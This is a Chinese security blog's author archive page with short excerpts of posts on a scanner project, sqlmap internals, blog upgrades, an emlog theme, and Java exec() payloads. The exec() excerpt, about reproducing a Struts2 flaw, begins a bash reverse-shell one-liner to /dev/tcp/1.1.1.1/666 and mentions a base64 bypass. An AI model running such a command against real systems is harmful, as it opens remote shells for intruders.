作者

本站作者小草 共计发布文章225篇

各类折腾

w12scan 想法和front-end

阅读(97)评论(0)

很久之前就有w12scan的想法,但是一直停留在那里,这次借毕业设计的机会,将它实现出来!~ Thinking原本设计出来是为了寻找SRC的资产等信息,后来觉得可以在扩大一下,保留SRC资产的收集功能,将范围扩大到全网。具体我想模仿zoomeye,fofa的全网检索功能,所以会将所有的域名IP信息进行深度的指纹识别入库,保留SRC的功能是指我可以随时指定扫...

python

sqlmap的一些技术细节(3).md

阅读(86)评论(0)

这节试图讲解更深层次的东西。 sqlmap哪些地方使用了多线程多线程并发可以加快像IO密集型的操作,但是sqlmap哪里使用了多线程呢?是检测的时候?是查表的时候,还是…?带着这个疑问,有了接下来的分析。 sqlmap的一些技术细节(1)中已经分析了多线程是如何实现的,并将线程封装成了函数runThreads,所以只需要全局搜索这个函数就找到了多线程使用...

碎碎语

看完P牛博客后的感想

阅读(1241)评论(2)

又是周五,晚上和往常一样无聊,在网上乱翻,又进到了P牛的博客https://www.leavesongs.com/,有句话是不是叫跟着前人的脚步好乘凉?于是点到了最后一页,时间定格在2012年12月13日,内容似乎是刚开学,并且最后这句 我希望自己快快学到更多,在大学里能快快成长。 感觉和我刚入大学时候何其类似。于是一口气看完了P牛的全部文章。...

各类折腾

Java Runtime.getRuntime().exec() 的那些payloads

阅读(1846)评论(0)

0x01在复现struts2遇到的问题,用命令执行反弹shell的时候总是失败,经过很久的测试,怀疑是"、<>等字符出现了问题。 0x02经过漫长的探索,和公开发布的poc中的payload,找到了绕过的方法,可以用类似base64编码的方式来绕过。比如bash -c 'sh -i >& /dev/tcp/1.1.1.1/666 ...

各类折腾

博客升级计划

阅读(2121)评论(2)

改装博客因为一些数据的历史性,加上也不想在折腾其他博客了,本来想自己写个博客的,但那时因为之前自己域名在国外,速度很慢,想做成静态化减小资源压力。但现在博客以及在国内备案,用腾讯云学生主机还是绰绰有余,所以没有自己造轮子的必要了,主要是解决一下emlog长久不更新内心存在的”不安全感”。 原系统中好多功能可以更加优美,加上漏洞部分,所以我决定对博客系统...

Emlog大前端

emlog大前端F4.0社区版正式发布

阅读(4160)评论(15)

emlog大前端社区版是emlog大前端的免费版本,仅用于个人博客 这次社区版终于更新了,因为F3.x版本已经年久失修,这次直接拿的4.9版本的内核作出的修改。在一些体验、样式和交互上会看到和4.9的体验几乎一样。 下载方式 但是相比于收费版本,社区...